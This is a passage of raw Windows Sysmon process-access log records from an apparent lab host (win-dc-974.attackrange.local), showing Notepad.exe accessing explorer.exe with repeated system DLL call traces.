|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002244162Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.811{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002244161Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.811{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000002244160Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.748{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002244159Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.748{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002244158Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.748{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002244157Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.748{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000002244156Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.748{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002244155Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.748{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002244154Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.748{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002244153Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.748{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000002244152Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.748{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002244151Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.748{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002244150Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.748{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002244149Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.748{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000002244148Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.748{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002244147Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.748{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM3